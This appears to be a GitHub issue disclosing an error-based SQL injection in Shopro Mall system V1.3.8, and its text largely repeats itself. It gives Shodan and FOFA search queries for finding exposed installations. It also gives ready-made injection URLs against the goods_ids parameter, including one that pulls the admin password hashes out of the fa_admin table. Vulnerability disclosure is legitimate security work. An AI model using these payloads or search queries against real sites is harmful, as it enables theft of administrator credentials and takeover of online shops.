Open secf0ra11 opened 2 years ago
Official Website:https://shopro.top Github:https://github.com/ITmonkey-cn/shopro.git
shodan:http.title:"shopro" fofa:title="shopro"
Error-Based SQL Injection
V1.3.8
F12 find something interesting
parameter goods_ids has sql error message
http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select database()),0x7e),1)-- -
Find information whit Error-Based SQL Injection
http://url/addons/shopro/goods/lists?page=1&goods_ids=32),updatexml(1,concat(0x7e,(select group_concat(password) from fa_admin),0x7e),1)-- -
https://github.com/secf0ra11/secf0ra11.github.io/blob/main/Shopro_SQL_injection.md
Shopro Mall system V1.3.8 Value parameter has SQL injection
Shopro Mall system
Official Website:https://shopro.top Github:https://github.com/ITmonkey-cn/shopro.git
Search
shodan:http.title:"shopro" fofa:title="shopro"
Vulnerability Type
Error-Based SQL Injection
Vulnerability Version
V1.3.8
Recurring environment:
Vulnerability Description AND recurrence
F12 find something interesting
parameter goods_ids has sql error message
Find information whit Error-Based SQL Injection
Ref
https://github.com/secf0ra11/secf0ra11.github.io/blob/main/Shopro_SQL_injection.md